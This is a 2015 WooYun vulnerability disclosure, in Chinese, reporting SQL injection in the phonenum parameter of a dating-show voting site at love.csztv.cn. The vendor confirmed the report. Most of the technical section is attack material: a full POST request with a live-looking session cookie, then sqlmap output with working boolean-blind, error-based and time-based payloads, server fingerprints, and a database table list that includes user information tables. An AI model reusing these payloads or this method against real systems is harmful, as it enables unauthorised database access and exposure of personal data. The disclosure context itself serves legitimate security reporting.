当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159853

漏洞标题:苏州广电网某站存在SQL注入漏洞(涉及众多男女嘉宾信息)

相关厂商:csztv.cn

漏洞作者: 深度安全实验室

提交时间:2015-12-10 12:10

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

《星梦奇缘》"活动(以下简称"活动")系由苏州广播电视总台举办之大型都市单身交友真人秀活动。

详细说明:

POST /home/dovote HTTP/1.1
Content-Length: 311
Content-Type: application/x-www-form-urlencoded
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2248440621c7a6c09b4b066b32a7931191%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22124.114.77.200%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1449635229%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Def6e45bd30510dca5b1b4ee805bc92e6; AJSTAT_ok_pages=2; AJSTAT_ok_times=1
Host: love.csztv.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
code=94102&phonenum=1&pid=0

3.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: phonenum (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: code=94102&phonenum=(SELECT (CASE WHEN (5354=5354) THEN 5354 ELSE 5354*(SELECT 5354 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pid=0
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: code=94102&phonenum=1 AND (SELECT 8648 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(8648=8648,1))),0x716a707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&pid=0
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: code=94102&phonenum=1 AND (SELECT * FROM (SELECT(SLEEP(5)))PQyO)&pid=0
---
web server operating system: Windows or Linux 7 or Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
Database: lubb
+---------------+---------+
| Table | Entries |
+---------------+---------+
| ht_vote_back | 264534 |
| ht_capta | 40409 |
| wy_capta | 18659 |
| wy_vote | 17292 |
| xm_userinfo | 1759 |
| xm_capta | 217 |
| xm_vote | 199 |
| xm_review | 150 |
| xm_person | 122 |
| pi_infomation | 108 |
| xm_image | 61 |
| ht_candidate | 55 |
| lotels | 42 |
| wy_student | 30 |
| ht_option | 10 |
| userinfo | 3 |
| ht_action | 1 |
| pi_user | 1 |
| wy_action | 1 |
| xm_action | 1 |
| xm_user | 1 |
+---------------+---------+

2.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-12-14 20:19

厂商回复:

已经废弃

最新状态:

暂无